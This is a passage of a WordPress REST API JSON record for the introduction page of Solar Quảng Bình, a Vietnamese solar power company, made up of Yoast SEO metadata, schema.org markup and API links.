\u0110i\u1ec7n M\u1eb7t Tr\u1eddi d\u00e0nh cho d\u00e2n d\u1ee5ng v\u00e0 c\u00f4ng nghi\u1ec7p v\u1edbi ch\u1ea5t l\u01b0\u1ee3ng h\u00e0ng \u0111\u1ea7u Vi\u1ec7t Nam, \u0111\u1ea1t ti\u00eau chu\u1ea9n qu\u1ed1c t\u1ebf. [...]\" \/>\r\n<meta property=\"og:url\" content=\"https:\/\/solarquangbinh.com\/?page_id=1272\" \/>\r\n<meta property=\"og:site_name\" content=\"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\" \/>\r\n<meta property=\"article:modified_time\" content=\"2020-01-02T00:58:33+00:00\" \/>\r\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\r\n<meta name=\"twitter:label1\" content=\"\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc\" \/>\n\t<meta name=\"twitter:data1\" content=\"8 ph\u00fat\" \/>\r\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/solarquangbinh.com\/?page_id=1272\",\"url\":\"https:\/\/solarquangbinh.com\/?page_id=1272\",\"name\":\"GI\u1edaI THI\u1ec6U - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\",\"isPartOf\":{\"@id\":\"https:\/\/solarquangbinh.com\/#website\"},\"datePublished\":\"2018-05-16T01:31:27+00:00\",\"dateModified\":\"2020-01-02T00:58:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/solarquangbinh.com\/?page_id=1272#breadcrumb\"},\"inLanguage\":\"vi\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/solarquangbinh.com\/?page_id=1272\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/solarquangbinh.com\/?page_id=1272#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Trang ch\u1ee7\",\"item\":\"https:\/\/solarquangbinh.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"GI\u1edaI THI\u1ec6U\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/solarquangbinh.com\/#website\",\"url\":\"https:\/\/solarquangbinh.com\/\",\"name\":\"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\",\"description\":\"\u0110i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi Qu\u1ea3ng B\u00ecnh, Solar Quang Binh, Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef, pin n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi, Solar Quang Binh\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/solarquangbinh.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"vi\"}]}<\/script>\r\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"GI\u1edaI THI\u1ec6U - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/solarquangbinh.com\/?page_id=1272","og_locale":"vi_VN","og_type":"article","og_title":"GI\u1edaI THI\u1ec6U - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","og_description":"GI\u1edaI THI\u1ec6U \u0110I\u1ec6N N\u0102NG L\u01af\u1ee2NG M\u1eb6T TR\u1edcI QU\u1ea2NG B\u00ccNH &#8211; SOLAR QU\u1ea2NG B\u00ccNH \u0110I\u1ec6N N\u0102NG L\u01af\u1ee2NG M\u1eb6T TR\u1edcI QU\u1ea2NG B\u00ccNH &#8211; SOLAR QU\u1ea2NG B\u00ccNH\u00a0chuy\u00ean cung c\u1ea5p s\u1ea3n ph\u1ea9m v\u00e0 gi\u1ea3i ph\u00e1p H\u1ec7 Th\u1ed1ng \u0110i\u1ec7n M\u1eb7t Tr\u1eddi d\u00e0nh cho d\u00e2n d\u1ee5ng v\u00e0 c\u00f4ng nghi\u1ec7p v\u1edbi ch\u1ea5t l\u01b0\u1ee3ng h\u00e0ng \u0111\u1ea7u Vi\u1ec7t Nam, \u0111\u1ea1t ti\u00eau chu\u1ea9n qu\u1ed1c t\u1ebf. [...]","og_url":"https:\/\/solarquangbinh.com\/?page_id=1272","og_site_name":"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","article_modified_time":"2020-01-02T00:58:33+00:00","twitter_card":"summary_large_image","twitter_misc":{"\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc":"8 ph\u00fat"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/solarquangbinh.com\/?page_id=1272","url":"https:\/\/solarquangbinh.com\/?page_id=1272","name":"GI\u1edaI THI\u1ec6U - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","isPartOf":{"@id":"https:\/\/solarquangbinh.com\/#website"},"datePublished":"2018-05-16T01:31:27+00:00","dateModified":"2020-01-02T00:58:33+00:00","breadcrumb":{"@id":"https:\/\/solarquangbinh.com\/?page_id=1272#breadcrumb"},"inLanguage":"vi","potentialAction":[{"@type":"ReadAction","target":["https:\/\/solarquangbinh.com\/?page_id=1272"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/solarquangbinh.com\/?page_id=1272#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Trang ch\u1ee7","item":"https:\/\/solarquangbinh.com\/"},{"@type":"ListItem","position":2,"name":"GI\u1edaI THI\u1ec6U"}]},{"@type":"WebSite","@id":"https:\/\/solarquangbinh.com\/#website","url":"https:\/\/solarquangbinh.com\/","name":"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","description":"\u0110i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi Qu\u1ea3ng B\u00ecnh, Solar Quang Binh, Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef, pin n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi, Solar Quang Binh","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/solarquangbinh.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"vi"}]}},"_links":{"self":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/pages\/1272"}],"collection":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/users\/318"}],"replies":[{"embeddable":true,"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1272"}],"version-history":[{"count":35,"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/pages\/1272\/revisions"}],"predecessor-version":[{"id":3592,"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/pages\/1272\/revisions\/3592"}],"wp:attachment":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1272"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}